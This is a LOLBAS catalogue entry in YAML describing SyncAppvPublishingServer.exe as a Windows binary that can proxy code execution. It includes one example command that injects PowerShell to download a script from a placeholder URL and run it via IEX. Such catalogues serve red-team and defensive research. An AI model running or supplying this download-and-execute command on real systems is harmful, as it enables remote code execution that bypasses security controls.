LOLBAS/yml/OSBinaries/Syncappvpublishingserver.yml

17 lines
528 B
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: SyncAppvPublishingServer.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Description: Example command on how inject Powershell code into the process
Full Path:
- C:\Windows\System32\SyncAppvPublishingServer.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/monoxgas/status/895045566090010624
Notes: Thanks to Nick Landers - @monoxgas